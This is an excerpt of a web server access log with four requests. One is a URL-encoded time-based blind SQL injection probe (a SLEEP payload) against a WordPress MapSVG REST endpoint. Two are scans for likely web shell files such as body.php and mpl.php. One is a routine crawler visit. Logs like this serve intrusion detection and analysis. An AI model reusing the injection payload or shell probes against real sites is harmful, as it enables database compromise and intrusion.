157.20.32.210 - - [18/Oct/2025:10:19:20 -0400] "GET /wp-json/mapsvg/v1/maps/2?id=1%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)--+ HTTP/1.1" 404 114 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15"
51.79.229.86 - - [18/Oct/2025:10:19:32 -0400] "GET /body.php HTTP/1.1" 404 10898 "http://salhab360photos.com/body.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:19:39 -0400] "GET /mpl.php HTTP/1.1" 404 10906 "http://salhab360photos.com/mpl.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:10:19:39 -0400] "GET /products60899186?kg=0060156596 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
